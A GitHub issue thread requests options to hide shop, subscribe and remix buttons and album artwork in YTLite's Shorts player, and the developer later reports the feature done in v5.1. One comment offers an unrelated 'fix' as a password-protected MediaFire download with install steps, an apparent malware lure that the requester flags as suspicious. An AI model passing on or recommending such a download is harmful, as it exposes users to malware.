### ISSUE TITLE
[Request] Hide “shop” “subscribe” “remix” and album artwork on the shorts player.

### ISSUE THREAD

**Issue by systox** [dayanch96/YTLite#164]
### Describe the feature request

```yaml
Feature request to hide the shop, subscribe, remix buttons, and album artwork on the shorts video player. Screenshot attached.
```

<img width="1376" alt="image" src="https://github.com/user-attachments/assets/54d0fb35-9299-44c2-a62f-f59b312f5b64">

### Post Requisites

- [X] I have checked that a similar feature request has not been reported before.
- [X] Verified the relevance of the project and the version you are using.
- [X] Provided a detailed description of the request and have filled in all required fields.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.
- [X] By submitting this request, **I confirm that I have filled in all the necessary fields and complied with the guidelines. Failure to comply may result in the request being closed without discussion, and repeated violations may lead to restrict account from further participation.**

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by systox** [comment]
That could be malware. Will wait for developer’s response.

**Comment by dayanch96** [comment]
Hey. Not sure about remix and artwork but I will take a look. Good job on all enhancement requests and issues - thank you.

**Comment by dayanch96** [comment]
Completed here: https://github.com/dayanch96/YTLite/releases/tag/v5.1
